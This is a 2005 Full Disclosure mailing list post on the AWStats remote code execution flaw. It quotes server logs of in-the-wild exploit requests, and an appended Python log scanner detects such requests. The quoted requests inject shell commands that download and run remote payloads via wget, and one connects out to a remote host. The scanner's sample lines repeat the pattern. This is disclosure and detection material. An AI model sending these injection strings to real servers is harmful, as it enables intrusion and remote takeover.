Full Disclosure mailing list archives

Re: [ GLSA 200501-36 ] AWStats: Remote code execution


From: Niels Bakker <niels-bugtraq () bakker net>
Date: Thu, 27 Jan 2005 02:44:49 +0100

* krustev () krustev net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
There's an exploit in the wild. Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET 
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00
 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET 
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00
 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET 
/cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527
 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.


        -- Niels.

-- 
(please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for
 the gazillion autoresponders of course)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
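
A defender's check for the request pattern in the log excerpts above, as an added example that is not part of the original message: it scans access-log lines for awstats.pl requests whose decoded parameters carry shell metacharacters or control bytes. The function name, the configdir allowlist and the sample lines (documentation addresses, example.invalid) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Assumption: a legitimate configdir is a plain filesystem path.
SAFE_CONFIGDIR = re.compile(r'[A-Za-z0-9_./-]*')
# Shell metacharacters and control bytes (covers the trailing %00 seen above).
SUSPICIOUS = re.compile(r'[|;`\x00-\x1f]|\$\(')

def suspicious_awstats_hits(lines):
    """Return (client, time, status, param, reason) for each flagged parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith("/awstats.pl"):
            continue
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # decode once, as the CGI would
            if name == "configdir" and not SAFE_CONFIGDIR.fullmatch(value):
                hits.append((client, when, status, name, "configdir is not a plain path"))
            elif SUSPICIOUS.search(value):
                hits.append((client, when, status, name, "shell metacharacter or control byte"))
    return hits

# Constructed sample lines (not taken from a real log).
SAMPLE = [
    '192.0.2.10 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?configdir=|cd%20/tmp;wget%20http://example.invalid/x;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0"',
    '192.0.2.20 - - [26/Jan/2005:07:00:00 +0000] "GET /cgi-bin/awstats.pl'
    '?config=example.org&year=2005 HTTP/1.1" 200 47768 "-" "Mozilla/4.0"',
    '192.0.2.30 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl'
    '?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"',
    '192.0.2.40 - - [26/Jan/2005:08:00:00 +0000] "GET /index.html?q=a|b HTTP/1.1" 200 120 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in suspicious_awstats_hits(SAMPLE):
        print(hit)
```

A flagged request that returned status 200 reached the CGI and should be triaged first; the character set is a heuristic and may need tuning for sites that pass unusual parameter values.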

